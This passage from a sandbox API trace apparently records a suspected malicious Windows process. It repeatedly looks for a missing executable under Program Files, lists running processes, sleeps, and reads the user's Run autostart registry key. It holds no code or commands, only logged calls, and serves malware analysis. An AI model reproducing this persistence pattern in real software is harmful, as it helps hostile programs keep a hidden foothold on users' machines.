DirectoryInfo=0x0) returned 1 [0303.075] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.075] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540e00) returned 1 [0303.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.087] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.090] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.092] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.092] NtClose (Handle=0x374) returned 0x0 [0303.092] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.092] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.093] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540e00) returned 1 [0303.093] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.093] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.093] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5410d8) returned 1 [0303.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.104] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.105] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.108] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.110] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.110] NtClose (Handle=0x374) returned 0x0 [0303.110] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.110] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.110] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540b90) returned 1 [0303.110] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.110] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.111] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540e00) returned 1 [0303.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.124] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.126] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.128] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.130] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.130] NtClose (Handle=0x374) returned 0x0 [0303.130] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.130] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.131] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540e68) returned 1 [0303.131] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.131] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.131] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540a58) returned 1 [0303.131] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.141] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.142] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.153] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.155] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.155] NtClose (Handle=0x374) returned 0x0 [0303.155] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.155] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.155] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5410d8) returned 1 [0303.156] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.156] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.156] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5410d8) returned 1 [0303.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.167] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.196] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.210] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.210] NtClose (Handle=0x374) returned 0x0 [0303.210] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.210] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.210] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540a58) returned 1 [0303.210] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.210] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.210] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x541008) returned 1 [0303.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.221] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.223] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.226] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.228] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.228] NtClose (Handle=0x374) returned 0x0 [0303.228] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.228] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.228] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x541008) returned 1 [0303.228] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.228] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.228] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5410d8) returned 1 [0303.228] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.238] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.240] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.242] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.244] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.244] NtClose (Handle=0x374) returned 0x0 [0303.244] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", 